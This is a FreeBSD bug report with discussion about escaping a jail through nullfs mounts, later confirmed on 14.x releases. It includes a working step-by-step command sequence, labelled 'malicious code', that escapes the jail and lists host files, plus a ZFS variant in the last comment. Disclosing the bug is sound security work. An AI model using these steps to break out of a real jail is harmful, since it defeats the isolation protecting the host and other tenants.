262180 – jail escaping via jail-friendly nullfs

Bug 262180 - jail escaping via jail-friendly nullfs

Summary: jail escaping via jail-friendly nullfs

Status:	Open

Alias:	None

Product:	Base System
Classification:	Unclassified
Component:	kern (show other bugs)
Version:	12.3-RELEASE
Hardware:	Any Any

Importance:	--- Affects Only Me
Assignee:	freebsd-bugs (Nobody)

URL:
Keywords:	needs-qa, security

Depends on:
Blocks:

Reported:	2022-02-24 23:43 UTC by firk
Modified:	2024-07-13 12:02 UTC (History)
CC List:	8 users (show)

See Also:

Attachments
Add an attachment (proposed patch, testcase, etc.)

Note You need to log in before you can comment on or make changes to this bug.

Description firk 2022-02-24 23:43:32 UTC

Jail could be escaped when run with enforce_statfs<2, allow.mount=true, allow.mount.nullfs=true.

prepare jail environment
> mkdir /j/1
> tar -c -f - /bin/ lib /libexec /sbin | tar -x -f - -C /j/1
> mkdir /j/1/tmp

start a vulnerable jail
> jail -c path=/j/1 persist=false allow.mount=true allow.mount.nullfs=true enforce_statfs=1 command=/bin/sh

malicious code
> mkdir /tmp/a /tmp/a/b/c /tmp/a/b/c/test /tmp/a/d
> mount -t nullfs /tmp/a/b/c /tmp/a/d
> cd /tmp/a/d/test
> mv /tmp/a/b/c/test /tmp/a/b/test
> ls -al ../../../../..
> ls -al ../../../../../..

you will see the files outside the jail

Comment 1 Graham Perrin freebsd_committer

2023-06-21 23:33:04 UTC

> 12.3-RELEASE

No longer supported. 

Can you reproduce symptoms with a supported RELEASE? 

<https://www.freebsd.org/security/#sup>

Thank you.

Comment 2 crest 2023-07-25 09:27:19 UTC

Where in your sequence of of commands did you attach to the jail? It's the jail that's locking in processes not the nullfs. Outside of the jail you're expected to be able to leave the nullfs with `cd ..`. Or did I miss-understand and the nullfs mount from inside the jail is able to expose a path from beneath the jail under the jail root directory despite the (n)mount performed inside the jail? If this is the case just ignoring it with a the release is EoL is a cheap cop out and we have to define what's the expected semantics for nullfs mounting at different enforce_statfs levels.

Comment 3 firk 2023-11-24 22:44:59 UTC

(In reply to Graham Perrin from comment #1)

> Can you reproduce symptoms with a supported RELEASE? 

Yes it still works on 14.0-RELEASE.

Comment 4 firk 2023-11-24 22:46:03 UTC

(In reply to crest from comment #2)

> Where in your sequence of of commands did you attach to the jail?

"jail" command does this (create+attach).

Comment 5 Thibault Payet 2024-07-12 18:11:24 UTC

This can be reproduced on 14.2 as well. (note the need to pass -p for mkdir).

Comment 6 Thibault Payet 2024-07-13 12:02:52 UTC

(In reply to Thibault Payet from comment #5)
Note that this does not work on ZFS if each jail are in separate datasets. See the result when using a dataset for /j

zfs create zroot/j
zfs set mountpoint=/j zroot/j
mkdir /j/1
mkdir -p /tmp/a /tmp/a/b/c /tmp/a/b/c/test /tmp/a/d
mount -t nullfs /tmp/a/b/c /tmp/a/d
cd /tmp/a/d/test/
mv /tmp/a/b/c/test /tmp/a/b/test

ls -al ../../../../..
Return

ls: ..: No such file or directory
total 2
drwxr-xr-x  3 0 0 3 Jul 13 11:54 .
drwxr-xr-x  7 0 0 7 Jul 13 11:54 1

And
ls -al ../../../../../..
Return
ls: ../../../../../..: No such file or directory